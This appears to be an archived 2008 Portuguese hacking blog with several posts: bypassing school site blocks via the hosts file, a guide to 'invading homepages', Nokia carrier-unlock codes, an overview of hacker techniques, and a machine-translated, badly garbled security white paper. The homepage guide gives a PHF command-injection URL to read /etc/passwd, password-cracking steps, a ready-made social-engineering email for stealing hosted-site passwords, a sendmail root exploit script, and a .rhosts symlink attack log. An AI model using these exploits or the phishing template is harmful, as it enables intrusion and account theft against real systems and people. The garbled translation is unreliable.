Conhecimento não é crime - Não Me Responsabiliso Pelo Uso Mau Intencionado De Nada Postado

Desbloquiando Orkut E Outros Sites Bloquiados!!!

2008-08-13T08:42:00.000-07:00

Desbloqueiar site sem programas Galera é Muito facil

Nas escolas eles bloqueiam desse jeito q e to fazendo

1º - Abri o disco C, vai na pasta WINDOWS

2º - Dentro da pasta Windows abri a pasta system32.

3º - Abri a pasta Drivers dentro da pasta System32

4º - abri a pasta etc (etc é nome da pasta) e abri a pasta hosts e coloca bloco de notas

5º No final do bloco de notas vai tar 127.0.0.1 na frente o nome do site blokeiado ai vc deleta esse treco e salva abri a internet e o site ta desbloqueiado

Invasão de Sities ( Não Me Responsabiliso Por Nada )

2008-06-05T10:20:00.001-07:00

Invadindo Hp's

Precauções que vc deverá
tomar quando hackear uma HP

Em primeiro lugar eu gostaria de avisar que hackear uma Home Page é crime, e dá cadeia.Se vc não hackear uma HP corretamente, seu IP ficará gravado em algum lugar e isso fará com que eles saibam

quem foi.Antes de fazer isso vc deverá estar preparado assim usando programas para
hackear.

A senha esta em um arquivo chamado password.
Esse arquivo está normalmente em um diretório chamado etc/passwd. Então vamos falar um pouco sobre o passwd.
Quando você pega o arquivo passwd, a senha pode vir encryptada ou então com shadow! A diferença é que a senha encryptada é a própria senha só que esta encryptada e a senha com shadow faz com que a senha fique escondida em outro lugar! Ou seja, não vai estar no passwd, vai estar em outro diretório. Para obter a senha escrita você vai ter que desencripta-la! As senhas com shadow são impossíveis de "desencryptar"! (levando em conta que você não tem unix).

Uma senha encryptada é mais ou menos assim :

root:User:d7Bdg:1n2HG2:1127:20:Superuser

TomJones:p5Y(h0tiC:1229:20:Tom

Jones,:/usr/people/tomjones:/bin/csh

BBob:EUyd5XAAtv2dA:1129:20:Billy

Bob:/usr/people/bbob:/bin/csh

Agora o exemplo de uma senha com shadow

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh

daemon:x:1:1:0000-Admin(0000):/:

bin:x:2:2:0000-Admin(0000):/usr/bin:

sys:x:3:3:0000-Admin(0000):/:

adm:x:4:4:0000-Admin(0000):/var/adm:

lp:x:71:8:0000-lp(0000):/usr/spool/lp:

smtp:x:0:0:mail daemon user:/:

uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:

nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/

usr/lib/uucp/uucico

listen:x:37:4:Network Admin:/usr/net/nls:

nobody:x:60001:60001:uid no body:/:

noaccess:x:60002:60002:uid no access:/:

webmastr:x:53:53:WWW

Admin:/export/home/webmastr:/usr/bin/csh

pin4geo:x:55:55:PinPaper

Admin:/export/home/webmastr/new/gregY/test/

pin4geo:/bin/falseftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/false

Você pode notar que tem um "x" no root! Esse
x pode ser representado também por um "*". Agora você já sabe um pouco mais
sobre o arquivo passwd e sobre as senhas.

Desencriptando

Para desencryptar uma senha precisaremos de
três arquivos básicos. Uma word list, um desencryptador (recomendo o crackerjack/jack
14)e logicamente o arquivo onde está senha (passwd). O que é cada um? Word list-
Como o próprio nome já diz, é uma lista de palavras. Desencryptador- É o
programa que você vai usar para desencryptar a senha. Passwd- Nesse arquivo está
a senha encryptada.

Coloque todos esses itens nesse mesmo
diretório. Abra o prompt do DOS e entre no diretório onde eles estão. Agora faça
o seguinte, digite : "nome do programa desencryptador" "nome do arquivo onde
esta a senha" "nome da sua word list" Então vamos supor que meu programa é o
jack, o arquivo é o passwd, a word list é lista. Então ficaria assim : jack
passwd lista.txt

E pronto! A senha está desencryptada! Mas
como isso funciona??

Quando você roda o jack ele pega o arquivo passwd e testa com todas as palavras
da word list.

Invasão por PHF

O phf é com certeza o modo mais simples de
se obter o arquivo passwd. É tão simples que você não precisa saber nada! A
única coisa que você tem que fazer é abrir seu browser e colocar uma URL. Porém
esse método tem 95% de chance de não funcionar! A maioria dos servidores já
acharam o bug e concertaram. Só colocar essa URL no local do seu browser :
http://Endereçodapage/cgi-bin/phf?Qalias=x%0a/bin/cat% 20/etc/passwd

Apenas isso e pronto!

Hackeando Home Pages de Servidores Grátis

Alguns servidores de home page tipo a
geocities, tripod e a angelfire, dão espaço para pessoas colocarem suas home
pages no ar. Há um modo bem simples de se obter ]a senha de home pages que estão
nesses servidores. Tudo que voce tem que fazer é mandar um e-mail pedindo pra
eles te mandarem a senha da home page. Mas não mande um e-mail estúpido tipo :
"por favor me mandem a senha". Façam algo mais convincente. Pegue todas as
informações da HP possíveis. Do tipo : "Mês passado eu me cadastrei no serviço
de vocês e recebi uma senha e um user name e meu endereço "endereço da HP do
cara". Eu coloquei algumas coisas no meu espaço e saí de férias. Quando voltei
das ferias eu tinha me esquecido da senha!! Só me lembrava do user name, que é :
"user name da HP". Fiquei um bom tempo de ferias e não pude pagar o provedor, por isso estou com um e-mail diferente do que consta no cadastro de vocês. O meu antigo e-mail era esse "mail do webmaster da HP" Por favor preciso que vocês me mandem um e-mail para "seu e-mail". Porque eu não tenho o backup dos arquivos que coloquei lá e não gostaria de perde-los. Obrigado pela atenção. Espero que voces mandem a senha o mais rápido que puderem."

Companhias como a geocities são muito
ocupadas pra ficar verificando se é verdade eu não! Provavelmente eles iram
acreditar e em 2 semanas (mais ou menos) você receberá a senha no seu e-mail!

Telnet e Exploits

Exploits é talvez o melhor método de hackear uma home page. Mas ele é um pouco mais complicado do que os outros métodos como phf e ftp. Antes de tudo você vai precisar de um programa de telnet. Exploits
expo em erros e bugs nos sistemas e normalmente te dão root, sysop, admin....
Vou listar alguns exploits abaixo :

Esse se chama sendmail bug.
Ele cria um programa /tmp/x que chama

shells como root.

cat << _EOF_>/tmp/x.c  



 #define RUN "/bin/ksh"  



 #include



 main()  



 {  



    execl(RUN,RUN,NULL);  



 }  



_EOF_  



#  



cat << _EOF_>/tmp/spawnfish.c  



 main()  



 {  



   execl("/usr/lib/sendmail","/tmp/smtpd",0);  



 }  



_EOF_  



#  



cat << _EOF_>/tmp/smtpd.c  



 main()  



 {  



   setuid(0); setgid(0);  



   system("chown root /tmp/x ;chmod 4755 /tmp/x");  



 }  



_EOF_  



#  



#  



gcc -O  -o /tmp/x /tmp/x.c  



gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c  



gcc -O3 -o /tmp/smtpd /tmp/smtpd.c  



#  



/tmp/spawnfish  



kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed 



s/"[ ]*"// |cut -d" " -f1`  



rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd 



/tmp/x.c  



sleep 5  



if [ -u /tmp/x ] ; then  



   echo "leet..."  



   /tmp/x  



fi

agora é um outro método.





catluvr (6 19:06) litterbox:~> ps -aux | grep pine  



catluvr   1739  0.0  1.8  100  356 pp3 S    19:07   0:00 grep 



pine  



hamors    1732  0.8  5.7  249 1104 pp2 S    19:05   0:00 pine  







catluvr (7 19:07) litterbox:~> ls -al /tmp/ | grep hamors  



- -rw-rw-rw-   1 hamors   elite            4 Aug 26 19:05 



.302.f5a4  







catluvr (8 19:07) litterbox:~> ps -aux | grep pine  



catluvr   1744  0.0  1.8  100  356 pp3 S    19:08   0:00 grep 



pine  







catluvr (9 19:09) litterbox:~> ln -s /home/hamors/.rhosts 



/tmp/.302.f5a4  







hamors (23 19:09) litterbox:~> pine  







catluvr (11 19:10) litterbox:~> ps -aux | grep pine  



catluvr   1759  0.0  1.8  100  356 pp3 S    19:11   0:00 grep 



pine  



hamors    1756  2.7  5.1  226  992 pp2 S    19:10   0:00 pine  







catluvr (12 19:11) litterbox:~> echo "+ +" > /tmp/.302.f5a4  







catluvr (13 19:12) litterbox:~> cat /tmp/.302.f5a4  



+ +  







catluvr (14 19:12) litterbox:~> rm /tmp/.302.f5a4  







catluvr (15 19:14) litterbox:~> rlogin litterbox.org -l hamors

Desbloquiando Celulares da Nokia!!

2008-06-05T10:07:00.000-07:00

Este tópico tem a finalidade de familiarizar a todos com o desbloqueio dos
aparelhos Nokia.

Suas databases estão expostas na Internet, diferente de muitos outros aparelhos,
como por exemplo os Motorola e os SonyEricsson. O que possibilita o desbloqueio
através de códigos e também a criação de calculadoras para a mesma finalidade.

Demonstraremos o procedimento utilizando a calculadoras mais recente para esses
aparelhos, desenvolvida pelo Crux. ( CruxUnlocker - disponível para download em
NOKIA SOFTWARES)

Considerações:

*Para se obter o IMEI do seu aparelho deve digitar *#06# no seu aparelho a
qualquer momento. No caso dos Nokia ele é exibido como Número de Série.

*Pressionando a tecla * gera os algarismos P, W e + para colocação do código no
aparelho.

*Tanto faz colocar o código com ou sem o SIMCARD dentro do aparelho, no final o
resultado será o mesmo.

*Cada aparelho Nokia possui uma gama de 5 tentativas de desbloqueio via código.
Após essas tentativas, somente através de metodos utilizando hardware (cabo de
dados, boxes, clips,...).

*Novos aparelhos recentemente adquiridos na Tim não são passiveis de desbloqueio
via código, portanto se após a colocação do código exibir a mensagem SIM NOT
RESTRICT e o aparelho continuar bloqueado, somente será possível fazer o
destravamento do aparelho via hardware ( DCT 3 - Cabo Mbus/Fbus + software / DCT
4 - somente via Box (Twister, Nbox) ou Clip DCT4)

Desbloqueio DCT 3.

Esses aparelhos tem o desbloqueio bem simplificado, basta seguir os destaques na
foto abaixo e os comentários que seguem.

*Pegamos aleatoriamente um IMEI para demonstrar o funcionamento.

1- DCT 3 / Aparelho = Nessa janela deveremos marcar a opção DCT 3 e o aparelho
que possui, no caso pegamos como exemplo o 3310.

2 - IMEI = Deveremos colocar o IMEI gerado pelo aparelho, ao digtar *#06#.

3 - Country = No nosso caso Brasil.

4 - Provider = Nessa parte iremos selecionar a operadora em questão. ( Oi, Tim,
Claro, BrT, ...).

5 - Após clicar em CALCULATE será gerado um código, no caso o código gerado foi
#pw+4768421191+1#. Não administrar ESPAÇOS na hora de colocar o código no
celular, até porque não é possível. A calculadora somente separa o código gerado
para facilitar a leitura.

IGNORE AS JANELAS GID 1, GID 2 e MSNI.

Ao final, se tudo correr bem o aparelho estará desbloqueado!

Desbloqueio DCT 4

Preste bastante atenção: Os aparelhos DCT 4 são bem mais complicados, mas não
chega a ser um bicho de 7 cabeças. Basta seguir todo o procedimento que será
descrito, que a chance de se sair bem sucedido é de 100%.

1-DCT 4 / Aparelho = Nessa janela deveremos marcar a opção DCT 3 e o aparelho
que possui, no caso pegamos como exemplo o 3100. Não se preocupe com variações
do tipo 3100 e 3100b, o código gerado será o mesmo em todos os casos desse tipo
de variação.

2-IMEI = Deveremos colocar o IMEI gerado pelo aparelho, ao digtar *#06#.

3-Country = No nosso caso Brasil.

4-Provider = Nessa parte iremos selecionar a operadora em questão. ( Oi, Tim,
Claro, BrT, ...).

5-Box e Asic - A algum tempo atrás essa era a grande dor de cabeça em
desbloquear um Nokia DCT4, pois existia variações que não era conhecidas por
todos. Hoje sabemos que a grande maioria dos DCT 4 são Asic 2 - V2. Logicamente
as variações ainda existem, mas a CruxUnlocker nos da a vantagem de nem sequer
tocar nesse ponto da calculadora, ela já faz o trabalho por si só. Pegue por
exemplo o 6230, esse aparelho só foi solucionado graças a um cara chamado Myke
que disponibilizou os source codes para a confecção dessa ótima ferramenta.
Trate-se de um Asic 6. Ao mudar na calculadora o aparelho para o 6230 verá que a
mesma automaticamente mudará para Asic 6 - Asic 6. Portanto fique tranqüilos com
essa parte, basta selecionar o aparelho e ela da conta do resto.

6 - Finalmente colocando o código no aparelho - Observe acima que diferente dos
DCT 3, que gera apenas 1 código, os DCT 4 geram 7 códigos. Eu destaquei os dois
que realmente vão importar na hora de colocar o código no aparelho. o primeiro
código destacado na tonalidade roxa, é o código padrão, apenas com ele na
maioria das vezes o aparelho é imediatamente desbloqueado, não fazendo
necessário a utilização do código destacado em ciano, que chamamos de Master
Code. Como somente possui 5 tentaivas, utilize o código #pw+***************+1#,
caso não resolva vá até o código #pw+***************+7#. caso não funcione
reveja todos os passos acima e tente novamente.

Abraços a todos

__________________________________________________________

Tutorial: Inserindo códigos de desbloqueio nos celulares Nokia.

Primeiramente, é importante saber que cada código é gerado a partir do Imei do
aparelho e do código da operadora a qual ele está bloqueado. Portanto serve
apenas para ser usado naquele aparelho especificamente.

O Imei do aparelho é o código de série dele que o identifica nas redes GSM a
qual ele estiver sendo usado. Para saber o Imei do seu aparelho, digite *#06#

Inserindo os códigos:

Para inserir o código, desligue seu aparelho e retire o chip, então ligue-o sem
o chip e como todo aparelho GSM, vai aparecer uma tela pedindo para inserir o
chip “insert sim card” ou “insira cartão sim”. É nessa tela que o código deverá
ser digitado. Basta apertar qualquer tecla que já vai aparecendo na tela o que
está sendo digitado.

O código é composto por #pw+xxxxxx+x# onde os xxxx compõem uma seqüência de
alguns números. Para digitar os caracteres p, w e +, eles aparecem apertando
repetidamente a tecla *

Após ter digitado o código corretamente, poderão aparecer alguns tipos de
mensagens. Se seu celular foi desbloqueado, aparecerá algo do gênero: “sim no
restricted” ou “code accepted” ou “código aceito” ou “restrição removida”.

Se o código que você digitou estava errado, deve aparecer algo do tipo “code
error”. Sendo assim, reveja se o Imei do seu aparelho foi informado corretamente
e se é realmente aquela operadora que ele apenas funciona com ela.

Muita atenção, pois seu aparelho permite apenas 5 tentativas de inserção de
códigos para desbloqueio, após isso, ele não poderá ser mais desbloqueado por
códigos e somente por Box. Se ele já estiver com as tentativas esgotadas, ao
inserir mais um código, aparecerá uma mensagem do tipo: “Cannot undo restriction”
ou “impossível desfazer restrição”.

Quando você estiver digitando o código, e demorar para digitar o seguinte
numero, o celular automaticamente apaga o que você já digitou e volta para tela
inicial mostrando “Insert sim card”. Isso não conta como uma tentativa de
desbloqueio. Volte a digitar os códigos novamente com atenção.

É recomendado que seja tentado o desbloqueio apenas com o 1º e o 7º código, os
terminados com +1# e +7#, pois se esses não desbloquearem certamente há algum
erro na forma como o código foi gerado e tentar mais vezes não haverá êxito e
sim o desperdício das tentativas.

Hackers

2008-06-05T09:43:00.000-07:00

Este artigo tem como objetivo a introdução do leitor a um aspecto do mundo (ou
submundo) virtual, a "Internet", que são os comentados "hackers" e "crackers" .
Através de explicações simples serão apresentadas as informações básicas sobre
este fascinante e empolgante assunto. Introdução: Várias são as fantasias e a
imaginação das pessoas sobre esta figura assustadora que navega no mundo
virtual. Então, vamos começar definindo primeiramente o que são estas figuras.
É aquele que tem conhecimentos profundos de sistemas operacionais e linguagens
de programação, principalmente "Unix" e "C" respectivamente. Conhece as falhas
de segurança dos sistemas e está sempre a procura de novas.
O mesmo que "hacker", com a diferença de utilizar seu conhecimento para o "mal". Destruir e roubar são suas palavras de ordem. Especializado em telefonia, atua na obtenção de ligações telefônicas gratuitas,
instalação de escutas, facilitando o ataque a sistemas a partir de acesso no
exterior, tornando-se invisíveis ao rastreamento ou colocando a responsabilidade
em terceiros. Devido ao grande número de pessoas que hoje se dizem "hackers",
novas definições poderão ser encontradas.
É quem está tentando ser "hacker", sai perguntando para todo mundo o que fazer para tornar-se um.
O pior de todos, são os "hackers de araque". Pensam que sabem tudo e acabam
acessando revistas virtuais pornográficas nas madrugadas. A Formação de um "hacker":
Estes seres pensantes possuem diversas formas de atuação, mas sua formação é
fundamental. Os verdadeiros "hackers" desenvolvem os seus próprios programas,
para tanto, são estudiosos profundos dos principais "softwares" utilizados na
"Internet". Conhecem um dos principais, senão o principal sistema operacional do
meio, o "Unix", "debulham" seus códigos fontes, por se tratar de sistema "freesource"
(código fonte aberto), alteram estes códigos, criando seus próprios utilitários.
Programam em "linguagem C", uma linguagem poderosa de programação. Mas não
satisfeitos continuam estudando, obtendo fontes de outros bons programas,
alterando-os, e novamente estudando, alterando, ... Algumas Formas de Atuação:
A Rota da Transgressão:

Violação de orelhões:

Para não ser descoberto, o "hacker" estaciona o carro perto de orelhões, onde se
conecta com um computador portátil para iniciar seu "trabalho". Ponte
Eletrônica: Computadores de instituições ou universidades menos protegidas, que
o "hacker" já tenha invadido, podem servir de ponte para suas novas tentativas
de invasão. "Cavalo de Tróia": Semelhante ao famoso presente dos troianos, onde dentro do
belo cavalo de madeira, estavam escondidos centenas de soldados prontos para
atacar a cidade presenteada, programas úteis ou inúteis, ou simples jogos,
possuem dentro deles, códigos capazes de não só executar a função proposta, como
também, destruir, armazenar, ou copiar informações do sistema. Temos como
exemplo, programas que imitam "login" de um provedor e armazenam esta informação
em locais onde posteriormente o "curioso" poderá recupera-la facilmente.

São passagens secretas, ou "porta dos fundos", isto é, senha secreta criada pelo autor do "software", não documentada, é claro, que independente do administrador do sistema pode ser usada para acessar ilimitadamente todos os recursos
disponíveis. "Farejamento de Redes": Utilizando-se do empacotamento das
mensagens nas redes de computadores, programas especialistas procuram neles
palavras como "password" e "senha". Quando encontradas, o programa copia o pacote e o envia para o computador do "hacker", que então se utiliza de técnicas próprias para tentar decodifica-las, pois as senhas estão todas "criptografadas".
Observando-se usuários de computadores digitarem suas senhas, procurando saber
datas de nascimento e nome de seus filhos, por exemplo, chega-se várias vezes a
descobrir suas senhas, pois em geral, as pessoas utilizam senhas que lembram
algo de sua vida particular. "Quebra Cabeça": Através de programas capazes de
montar combinações de letras e números, os "hackers" tentam acessar os seus
alvos. Esta técnica é muito demorada, pois as tentativas deverão ser efetuadas
por um período curto e com grandes intervalos de tempo, para não despertar
suspeita. Muitos usuário utilizam senhas iguais ao do nome do "login" , ou seu próprio nome para "login" e sobrenome para "password". Pior ainda, alguns administradores utilizam as senhas padrões em seus sistemas, facilitando
bastante a atuação dos "hackers". "Invasão do Servidor": Através de "ftp"
anônimo, pode-se baixar o arquivo que contem as "passwords" dos usuários e,
através de técnicas de tentativa de "descriptografias", obter "passwords" deste
provedor. Alguns Utilitários Conhecidos: Diversos são os utilitários disponíveis na citarei alguns: Brincadeiras de mal gosto: Atinge principalmente usuários da "Internet" que se utilizam de provedores de acesso. São enviados, através de programas apropriados, repetidas vezes, até centenas, a mesma mensagem, que "estouram" a área limitada na caixa postal para receber mensagens, passando o provedor a rejeitar novas mensagens para o usuário, as vezes importantes para o negócio de uma empresa. Programas de normalmente preenchem o campo "from:", mas existem programas, como por exemplo, o "Anonymail", que deixam o usuário preencher os campos de e em que servidor de "e-mail" deseja enviar a mensagem, podendo o usuário se passar por quem quer que seja.
Programa criado por que os usuários que se utilizam do Windows 95em seus acessos a "Internet". É necessário para sua execução saber
qual o IP da vítima.

Roubo na "Internet":

"Credit Card":

Programas geradores de números de cartões de crédito válidos que podem ser
usados para acessar "sites" pagos. Não são usados com a própria senha, ou da
casa do infrator, devendo ser efetuada a desconecção em alguns minutos, evitando
assim o rastreamento, principalmente de "sites" americanos.

"Cracker":

Decodificadores de "password", "número de série" ou "certificado de registro",
para "softwares", geralmente "sharewares", e com isto, torna-los "registrados" e
com todos os seus recursos habilitados. Páginas WWW: Vários "crackers" criam
páginas na "Internet" que são simplesmente verdadeiros bancos de dados com
informações de números seriais e senhas de acesso aos mais variados tipos de
"softwares" e "sites" de acesso limitado ("sites" pagos), principalmente "sites"
sobre sexo.

Resumo:

Hackers são viciados em Internet que usam seus conhecimentos para roubar senhas,
destruir conexões e algumas outras coisas, mas o conceito de hacker mudou muito
ao longo dos anos.Primeiramente, o hacker era aquele que "hackiava" a partir do
File Transfer Protocol, invadindo pequenas empresas ou provedores, roubando
senhas de conexão e outras coisas do tipo. Hoje hacker significa muito mais,
pode ser a pessoa que te desconecta da rede, que te manda um e-mail bomba ou
sabe um pouco de HTML e Javascript e gosta de se gabar com isso. Além disso,
existem também os vírus, normalmente pequenos programas que se instalam no
computador infectado e começam a destruí-lo a partir de um determinado dia. Hoje
os hackers não são mais tratados como vilões na rede, muitas vezes até como
heróis. Existem muita pessoas que dizem serem hackers mas que na verdade não
sabem nada. Uma passada numa página hacker e alguns programas nuke não tornam
ninguém um hacker, lembre-se disso. Para proteger-se contra os hackers, use uma
ferramenta de busca qualquer e digite palavras como anti-nuke, proteções,
detectors, etc

Técnicas Adotadas Por ' Crackers De Sistema' Quando Tentando Invadir

2008-06-05T05:15:00.000-07:00

Pelos consultores do Ltd De Soluções De Segurança De Rede.
Frontal-linha Time De Segurança De Informação (PUNHO), Dezembro 1998.

fist@ns2.co.uk http://www.ns2.co.uk

------------------------------------------------------------------------------- 0 Índices ------------------------------------------------------------------------------

1. Introdução 1.1 Somente que é vulnerável de qualquer modo?
1.2 Perfil de um típico ' cracker de sistema'

2 Rede 2.1 metodologias de Rede adotadas por muitas companhias 2.2 Compreendendo vulnerabilidades em tais sistemas em rede

3 O ataque si mesmo 3.1 Técnicas utilizadas para 'manto' a localização do attackers 3.2 probing de Rede e reunião de informação 3.3 Identificando confiada componentes de rede 3.4 Identificando componentes de rede vulneráveis 3.5 Aproveitando componentes de rede vulneráveis 3.6 Sobre ganho acessa para componentes de rede vulneráveis

4 Abusando rede acessa e privilégios 4.1 Descarregando informação sensível 4.2 Partindo outro confiado redes dos anfitriões 4.3 Instalando backdoors e arquivos do trojaned 4.4 Tomando Nota De redes

5 A melhora de segurança de rede total 5.1 Sugerida leitura 5.2 Sugerida ferramentas e programas

------------------------------------------------------------------------------- 1.0 Introdução ------------------------------------------------------------------------------

Este papel branco foi escrito ajudar dá administradores de sistemas e pessoal de operações de rede uma visão dentro a tática e metodologias adotadas por crackers de sistema típico quando targeting redes grandes.

Este documento está não um guia sobre como para seguro suas redes, embora isto deveria ajudar você identifica segurança arrisca em seu ambiente em rede e talvez ajuda aponta quaisquer acidentes que estão esperando acontecer.

Nós desejamos você desfruta leitura este papel, e esperançosamente aprende um pequeno sobre como crackers opera nesse meio tempo!

O Ltd De Soluções De Segurança De Rede. BATA pessoal (fist@ns2.co.uk)

------------------------------------------------------------------------------- 1.1 Somente que é vulnerável de qualquer modo?
-------------------------------------------------------------------------------

Ambientes de computador Em Rede são utilizados todo dia por corporações e vários organisations. Redes de computadores permitem usuários para compartilhar quantias vastas de dados muitos eficientemente.

Usualmente redes associadas não são projetadas e implementadas com segurança em mente, meramente funcionalidade e eficiência, embora isto é boa de um ponto de vista de negócios no curto-termo, problemas de segurança usualmente sobem mais tarde, que podem milhões de custo para resolver em ambientes mais grandes.

A Maioria Das redes particulares sensíveis e associadas trabalham em um cliente-servidor princípio, onde empregados usam workstations para conectar para servidores para que compartilham informação. Neste papel nós concentraremos em segurança de servidor, como a maioria do crackers vai sempre primeiro de servidores de alvo, o servidor é muito gostado de um 'centro' onde todo a informação é armazenada. Se um cracker pode ganhar unauthorised acessa para tal um servidor, o descanso dele trabalho é fácil.

Festas Vulneráveis para grande-escala probes de rede usualmente inclue :

Instituições Financeiras e bancos Governo De companhias do Pharmaceutical De provedores de serviço Internet e Contratantes De agências de defesa para várias agências do goverment corporações Multinacionais

Embora muitos destes ataques tomam lugar internamente (por usuários que têm authorised acessa separar das redes sensíveis ou associadas já), nós estaremos concentrando nas técnicas utilizadas quando invadindo tais redes inteiramente do exterior.

Instituições Financeiras e bancos são probed e atacado em tentativas para comprometer fraude. Muitos bancos têm sido targeted desta forma, arriscando fundos monetários vastos. Bancos fazem isto política não para permitir ser as vítimas de tais ataques externos porque eles certamente perderão clientes e confiam se ataques são publically sabido.

Provedores de serviço Internet são um alvo comum por crackers, como servidores do ISP estão facilmente acessíveis da internet, e do ISP tem acessado para fibra grande conexões óticas que podem estar utilizadas por crackers para mover quantias grandes de dados através a internet. O ISP mais grande também tem bancos de dados de cliente, que usualmente contêm informação do usuário confidencial tal como números de cartão de crédito, especifica e endereços.

Companhias do Pharmaceutical são vítimas de principalmente tentativas de espionagem industriais, onde um time de vontade do crackers seja pagada quantias grandes em troca para roubada dados do pharmaceutical, tais companhias de droga freqüentemente gastam milhões em pesquisa e desenvolvimento, e um muito pode ser perdido como um resultado de tal um ataque.

Acima Do durado 6 anos, Governo e agências de defesa nos Estados Unidos têm sido vítima para literalmente milhões de ataques originando da internet. Devido à segurança de informação baixa orça e as políticas de segurança fracas de tais agências, segurança de informação tem tornada-se uma batalha do uphill, como governo e servidores militares estão constantemente sendo probed e atacado por crackers.

Contratantes de Defesa, embora segurança ciente, são alvos ao crackers procurando classificado ou dados militares sensíveis. Tais dados podem então são 'vendidos em' por crackers para grupos estrangeiros. Embora unicamente um punhado destes casos têm sido publically sabido, tais atividades podem ocorrer em uma valor alarmante.

Corporações Multinacionais são exemplos do prime de vítimas de tentativas de espionagem industriais. Corporações Multinacionais têm escritórios baseados completo o mundo, e redes associadas grandes são instaladas em pedido aos empregados para ser capazes de compartilhar informação eficientemente. Pessoal do NSS tem desempenhado penetration testa para corporações multinacionais, e nossas descobertas em a maioria dos casos têm mostrados que muitos podido seja comprometido.

Companhias do pharmaceutical Iguais, corporações multinacionais operando em eletrônica, software ou computador-relacionadas indústrias, gastam milhões em pesquisa e desenvolvimento de novas tecnologias. Isto é muito tentadodo para um competidor de tal uma corporação, para empregar um time de ' crackers de sistema' para roubar dados de uma corporação de alvo. Tais dados podem então estão utilizados para rapidamente e facilmente melhoram o conhecimento de competidores de tecnologias chaves, e resultam em perdas financeiras da corporação de alvo.

Outro forma de ataque adotado por competidores de corporações, está para 'toma nota de' uma rede associada para uma quantia certa de tempo, este resultados em perda de salário à corporação de alvo. Em a maioria dos casos isto está extremamente difícil para localizar a fonte de tal um ataque. Contando Com o segmentation de rede interno em lugar, esta espécie de ataque pode estar enormemente efetivo e resulta em perdas financeiras maciças.

Tal ' jogo sujo' é lugar comum em sociedade em rede de hoje, e deveria seria tomar muita seriamente.

------------------------------------------------------------------------------- 1.2 Perfil de um típico ' cracker de sistema' ------------------------------------------------------------------------------

Estudos têm mostrados aqueles típicos uns ' cracker de sistema' está usualmente masculino, envelhecido entre 16 e 25. Tal crackers usualmente torna-se interessado em invadir máquinas e redes para que melhoram suas habilidades partidas, ou para usar recursos de rede para seus próprios propósitos. A Maioria Do crackers estão completamente persistente em seus ataques, isto é devido à quantia de tempo livre um cracker médio tem.

Uma alta porcentagem de crackers são oportunistas, e correm scanners para checar números maciços de anfitriões para vulnerabilidades de sistema remotas. Sobre identificar os anfitriões ou redes que são vulneráveis para ataques remotos, o cracker usualmente ganhará raiz acessa ao anfitrião, então instala um backdoor e remenda o anfitrião de vulnerabilidades remotas comuns, isto previne outro crackers de existência capaz para usar as mesmas técnicas populares para ganhar acesso ao anfitrião.

Oportunistas operam em primeiramente dois domínios, a primeira existência a internet, as segundas redes de telefone de existência.

Para examinar os anfitriões internet para vulnerabilidades remotas comuns, o cracker usualmente lançará uma operação examinada de um anfitrião que ele tem acessado para com uma conexão rápida à internet, usualmente em uma fibra-ótica conexão.

Para examinar para máquinas operando em redes de telefone, sendo servidores terminais, boletim hospeda sistemas, ou voz envia sistemas. O cracker usará um programa do wardialling, esta vontade automaticamente examina quantias grandes de números de telefone para 'carregadores', assim identificando tais sistemas.

Uma muita pequena porcentagem de crackers realmente define alvos e tentam atacar eles, tal crackers estão longe mais hábis, e adotam 'incisivos-margem' técnicas para comprometer redes. Isto é conhecido para esses tipos de crackers para atacar redes associadas que são firewalled da internet por explorar não-publicadas vulnerabilidades e 'recursos' no firewalls.

As redes e hospeda targeted por esses crackers usualmente tem dados sensíveis contidos dentro eles, tal como pesquisam e notas de desenvolvimento, ou outros dados que provarão útis ao cracker.

Tal crackers são também conhecido de tem acessado explorar e ferramentas utilizadas por consultores de segurança e companhias de segurança grandes, e então uso eles para examinar definido alvos para todo sabido vulnerabilidades remotas. Crackers que estão atacando anfitriões específicos estão também usualmente muito paciente, e tem sido conhecido gastar muitos meses juntando dados antes tentar ganhar acesso para um anfitrião ou rede.

------------------------------------------------------------------------------- 2.1 metodologias de Rede adotadas por muitas companhias ------------------------------------------------------------------------------

Uma vontade de corporação típica tem uma presença internet aos seguintes propósitos :

O hospedado de E-mail Do webservers associado e outras comunicações globais via. a internet Para dar os empregados acesso internet

Do NSS DE corporações tem desempenhado penetration de rede testa da internet para, um ambiente em rede é adotado onde a rede associada e a internet são seperated por firewalls e proxies de aplicação.

Em tais ambientes, o webservers associado e mailservers são usualmente guardados nos 'exterior' da rede associada, e então informação é passada via. confiado canais sobre a rede associada.

No caso de confiança apresenta entre o mailservers externo e hospeda na rede associada, uma bema-pensamento filtro política tem colocar dentro efeito, como usualmente o mailservers externo deveria unicamente ser capaz de conectar para porta 25 de um solteiro 'seguro' mailserver na rede associada, como esta vontade maciçamente minimise a probabilidade de acesso do unauthorised, mesmo que o mailserver externo é comprometido.

Um Dos NSS DE redes associado tem desempenhado penetration testa em também teve um punhado de 'dual-homed' anfitriões, esses anfitriões tiveram interfaces de rede ativas em ambas a internet e a rede associada. De um ponto de vista de segurança, tais anfitriões que operam em redes múltiplas podem posar uma ameaça maciça para segurança de rede, como sobre comprometer um anfitrião, isto então substitui um simples 'ponte' entre redes.

------------------------------------------------------------------------------- 2.2 Compreendendo vulnerabilidades em tais sistemas em rede ------------------------------------------------------------------------------

Na internet, uma corporação pode tem 5 webservers externo, 2 mailservers externo, e um firewall ou filtro sistema implementado.

Webservers estão usualmente não atacado por crackers desejando ganhar acesso à rede associada, a menos que o firewall é misconfigured em algum caminho que permitirá o cracker acessa à rede associada sobre comprometer o webserver. Embora isto está sempre bom practise para seguro seu webservers e corre TCP wrappers para festas para conectar ao telnet e portas de ftp.

Mailservers estão comumente targeted por crackers desejando ganhar acesso à rede associada, como um mailserver deve tem acessar ao mailservers na rede associada para que distribue e troca correspondência entre a internet e a rede associada. Outra Vez, contando com o filtro em lugar, este tactic pode ou efetivo em parte do cracker.

Filtro routers estão também comumente targeted por crackers com agressive-snmp scanners e fio de comunidade bruto-força programas, se tal um ataque é efetivo, o router pode facilmente ser virado uma ponte, assim permitindo unauthorised acessa à rede associada.

